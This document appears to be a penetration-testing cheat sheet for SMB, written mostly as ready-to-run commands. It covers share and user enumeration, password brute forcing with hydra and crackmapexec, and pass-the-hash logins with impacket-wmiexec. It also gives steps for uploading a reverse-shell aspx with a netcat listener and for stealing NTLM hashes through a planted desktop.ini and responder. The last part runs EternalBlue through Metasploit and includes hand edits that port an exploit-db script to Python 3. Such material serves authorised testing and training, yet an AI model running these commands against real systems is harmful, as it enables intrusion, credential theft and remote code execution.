SMB (Server Message Block) Pentesting
Last modified: 2023-09-09
It allows clients, like workstations, to communicate with a server like a share directory. Samba is derived from SMB for linux. Default ports are 139, 445.
Enumeration
To enumerate automatically, you can use nmap.
# Nmap
nmap --script smb-brute -p 445 <target-ip>
nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>
nmap --script smb-enum* -p 445 <target-ip>
nmap --script smb-protocols -p 445 <target-ip>
nmap --script smb-vuln* -p 445 <target-ip>
# NetBIOS names
nmblookup -A 10.0.0.1
nbtscan 10.0.0.1
# Find shared folders
# -N: No password
# -L: List shared directories
smbclient -N -L <target-ip>
# Find shared folders and files
# -M: Module
crackmapexec smb <target-ip> -u username -p password -M spider_plus
cat /tmp/cme_spider_plus/<target-ip>.json
# Find writable shared folders
impacket-psexec example.local/username@<target-ip>
# Enumerate users and groups
impacket-lookupsid example.local/username@<target-ip> -no-pass
impacket-lookupsid example.local/username@<target-ip> -hashes <lmhash>:<nthash>
impacket-lookupsid example.local/username@<target-ip>
impacket-lookupsid example.local/guest@<target-ip>
If we got "STATUS_PASSWORD_MUST_CHANGE" for some users, we can update a current password to a new one.
smbpasswd -r <target-ip> -U <username>
# or
impacket-smbpasswd <DOMAIN>/<username>:<password>@<target-ip> -newpass <new-password>
# If you don't have impacket-smbpasswd, download it from a repository.
wget https://raw.githubusercontent.com/fortra/impacket/master/examples/smbpasswd.py
Enum4linux
Enum4linux enumerates users, shared directories, etc. over SMB.
# Basic
enum4linux <target-ip>
# All enumeration
enum4linux -a <target-ip>
# Verbose
enum4linux -v <target-ip>
# Specify username and password
enum4linux -u username -p password <target-ip>
Enum4linux-ng
enum4linux-ng is a rewrite of the original enum4linux
.
To install manually, execute the following commands.
# Installation
git clone https://github.com/cddmp/enum4linux-ng
cd enum4linux-ng
python3 -m venv venv
source venv/bin/activate
pip install wheel
pip install -r requirements.txt
After installing, run enum4linux-ng
as below.
# -A: All simple enumeration including nmblookup
python enum4linux-ng.py -A <target-ip>
# -As: All simple short enumeration without NetBIOS names lookup
python enum4linux-ng.py -As <target-ip>
# -u: Specific username
# -p: Specific password
python enum4linux-ng.py -u "administrator" -p "password" <target-ip>
Smbmap
Smbmap allows users to enumerate samba share drives across an entire domain.
smbmap -H <target-ip>
# Recursive
smbmap -H <target-ip> -R
# Username and password
smbmap -u username -p password -H <target-ip>
# Execute a command
smbmap -u username -p password -H <target-ip> -x 'ipconfig'
Brute Force Credentials
hydra -l username -P passwords.txt <target-ip> smb
hydra -L usernames.txt -p password <target-ip> smb
# Enumerate other users
crackmapexec smb <target-ip> -u username -p password --users
# Enumerate users with the same password
crackmapexec smb <target-ip> -u users.txt -p password --continue-on-success
# Brute force using a list of password hashes
crackmapexec smb <target-ip> -u <username> -H hashes.txt
# Metasploit
msfconsole
msf> use auxiliary/scanner/smb/smb_login
If we find credentials, we can use them for smbclient or WinRM.
Connect
You can use smbclient to connect the target.
# -L: List of shares available on a host
# -N: No password
# -U: Username
smbclient -L 10.0.0.1
smbclient -N -L 10.0.0.1
smbclient -N -L \\\\10.0.0.1
smbclient -L 10.0.0.1 -U username
# anonymous
smbclient //10.0.0.1/somedir -N
# with space
smbclient "//10.0.0.1/some dir" -N
# Specify shared directory
smbclient //10.0.0.1/somedir -U username
# nobody, no-pass
smbclient //10.0.0.1/somedir -N -U nobody
# Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username
To get a Windows shell, run the following examples.
impacket-wmiexec example.local/username@10.0.0.1
# Pass the Hash
impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1
Commands in SMB
After connecting, we can investigate the shared folder to find sensitive files or information.
List Folders/Files
smb> ls
Download Folders/Files
smb> get sample.txt
# If the filename contains spaces, it need to be enclosed in double-quotes.
smb> get "Example File.txt"
To download files recursively, run the following commands.
smb> mask ""
smb> recurse ON
smb> prompt OFF
smb> mget *
Or using smbget from local machine.
Especially, it’s useful for downloading a large file rather than “get” command in smbclient.
smbget smb://<target-ip>/somedir/example.txt -U username
smbget -R smb://<target-ip>/somedir -U username
# Specify workgroup
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username
# as anonymous user
smbget smb://<target-ip>/somedir -U anonymous
password: anonymous
Upload Files
# Upload a file
smb> put example.txt
- Upload Reverse Shell Payload
If the website is associated with the SMB server, we can upload reverse shell script such as aspx
, php
and get a shell.
To create a payload, please refer to the Web Reverse Shell or the Reverse Shell with Metasploit.
Then upload it to the SMB server as below.
smb> put shell.aspx
Don’t forget to start a listener for getting outcoming connection.
nc -lvnp 4444
Now access to https://example.com/path/to/smb/share/shell.aspx
.
We can get a shell.
Steal NTLM Hash with Desktop.ini
Reference: https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini
We can retrieve the hashes by putting desktop.ini
file, that contains arbitrary icon resource path, to the shared folder.
Create a new desktop.ini
in local machine.
[.ShellClassInfo]
IconResource=\\<local-ip>\test
Then upload it to the writable shared folder.
smb> put desktop.ini
Start responder in local machine.
responder -I tun0
After a while, we can retrieve the NTLM hashes.
EternalBlue (MS17-010)
msfconsole
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set rhosts <target-ip>
msf> set lhost <local-ip>
msf> run
# If you cannot get a shell with the default payloed (windows/x64/meterpreter/reverse_tcp), try to change the payload
msf> set payload payload/generic/shell_reverse_tcp
AutoBlue
AutoBlue is an automatic exploit.
Download the repository and run the following example command.
python zzz_exploit.py -target-ip <target-ip> -port 445 'username:password@target'
Manual Exploiting
You need to have two files - exploit.py, mysmb.py
-
Download mysmb.py
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py -O mysmb.py # Convert DOS to UNIX dos2unix mysmb.py
-
Edit Some Lines of mysmb.py for Python3
You need to edit some code because this exploit is old so only supports Python2.
Line.69 # transData = b'' transData = '' Line.73 # transData = ('\x00' * padLen) + str(parameters) transData = "".join(map(chr,(b'\x00' * padLen))) + str(parameters) Line.80 # transData += ('\x00' * padLen) + data transData += "".join(map(chr,(b'\x00' * padLen))) + str(data) Line.231 # req = str(pkt) req = pkt.getData() return b'\x00'*2 + pack('>H', len(req)) + req # assume length is <6553 Line.381 # data += resp['Data'][1:] data += resp['Data'][1:].decode()
-
Download exploit.py
wget -O exploit.py https://www.exploit-db.com/exploits/42315 # Convert DOS to UNIX dos2unix exploit.py
-
Edit the Credentials in exploit.py
... username = "username" password = "password" ...
-
Run the script
python exploit.py <target-ip> netlogon python exploit.py <target-ip> lsarpc python exploit.py <target-ip> samr
Launch SMB Server
impacket-smbserver share . -smb2support -username user -password pass
Access from Remote Machine
net use \\<local-ip>\share /u:user pass
Transfer Files
# Remote to Local
cp .\example.txt \\<local-ip>\share\example.txt